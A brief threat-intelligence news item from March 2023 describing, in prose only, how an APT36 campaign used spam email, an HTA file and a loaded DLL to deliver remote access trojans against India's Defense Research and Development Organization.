APT36 Targets Indian Defense Research And Development Organization (DRDO)

March 29, 2023

A recent APT36 campaign began with spam email which contained a link to a malicious file hosted on a compromised website. Mshta.exe was then used to connect to a specific URL and execute a Microsoft HTML Application file which decoded and decompressed a PowerPoint file within a temporary folder. The PPT file then loaded a DLL file into memory which was triggered using the DynamicInvoke method. The final payload was remote access trojans used to exfiltrate sensitive information including clipboard data screenshots keystrokes and a list of files and folders.
Subscribe